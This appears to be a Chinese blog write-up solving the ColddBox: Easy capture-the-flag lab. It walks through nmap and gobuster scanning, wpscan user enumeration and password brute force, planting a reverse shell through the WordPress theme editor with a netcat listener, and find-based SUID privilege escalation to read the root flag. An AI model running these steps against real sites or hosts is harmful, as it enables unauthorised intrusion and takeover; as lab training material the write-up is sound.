ColddBox: Easy靶场渗透

将两台虚拟机网络连接都改为NAT模式

  1. 攻击机上做namp局域网扫描发现靶机

    nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.155

  1. 对靶机进行端口服务探测

    nmap -sV -T4 -p- -A 192.168.23.155

发现 4512 端口开放着 ssh 服务,可能是因为管理员为了安全将工作端口 22 改到了 4512

  1. 访问 80 端口开放的 web 服务

扫描网站子目录

复制代码
gobuster dir -u http://192.168.23.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

根据网站目录结构判断网站是 wordpress CMS 建站的

  1. 在网站目录下发现隐藏信息

http://192.168.23.155/hidden/

紧急通知科尔德,你修改了雨果的密码,麻烦尽快把新密码发给他,这样他才能继续上传文章。菲利普

  1. 在使用专项扫描工具查找 wordpress 站点相关的系统薄弱点

    wpscan --url http://192.168.23.155

再扫描枚举网站账户名称

复制代码
 wpscan --url http://192.168.23.155/ --enumerate u 

得到四个用户名

the cold in person

philip

c0ldd

hugo

  1. 将上述内容写入密码本,然后使用大字典进行爆破

    mousepad user.txt
    wpscan --url http://192.168.23.155 -U user.txt -P /usr/share/wordlists/rockyou.txt

最后得到一对账户密码

c0ldd/9876543210

  1. 使用上述账密登录成功登录网站

在后台对wordpress 的主题进行编辑,在下述页面黏贴 kali 自带的反弹 shell 代码

http://192.168.23.155/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=72&updated=true

更新网站页面代码之后,访问 404.php 的网站页面触发反弹 shell

http://192.168.23.155/wp-content/themes/twentyfourteen/404.php

  1. 注意 kali 在触发反弹 shell 之前就需要监听 4444 端口以 getshell

    nc -lvvp 4444

成功 getshell,然后 php 启动一个可交互 shell

复制代码
php -r 'system("/bin/bash -i");'
  1. 信息收集一下

    id
    ls /home
    uname -a
    lsb_release -a

  1. 然后查看一下提权方法

    sudo -l
    find / -perm -u=s -type f 2>/dev/null

然后就是 find 命令提权

复制代码
cd /tmp
touch test
find test -exec whoami \;
find test -exec cat /root/root.txt \;

成功提权得到 flag,base64 解密一下 即可

相关推荐
旺仔Sec3 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用3 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
浩浩测试一下3 小时前
内网---> WriteOwner权限滥用
网络·汇编·windows·安全·microsoft·系统安全
原来是你~呀~4 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian4 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
Loo国昌4 小时前
【大模型应用开发】第六阶段:模型安全与可解释性
人工智能·深度学习·安全·transformer
乾元4 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
安科瑞刘鸿鹏174 小时前
高速路灯故障难定位?用 ASL600 实现精确单灯监测与维护预警
运维·网络·物联网·安全
Whoami!4 小时前
⓫⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用Windows计划任务提权
网络安全·信息安全·利用windows计划任务提权
darkb1rd14 小时前
四、PHP文件包含漏洞深度解析
网络·安全·php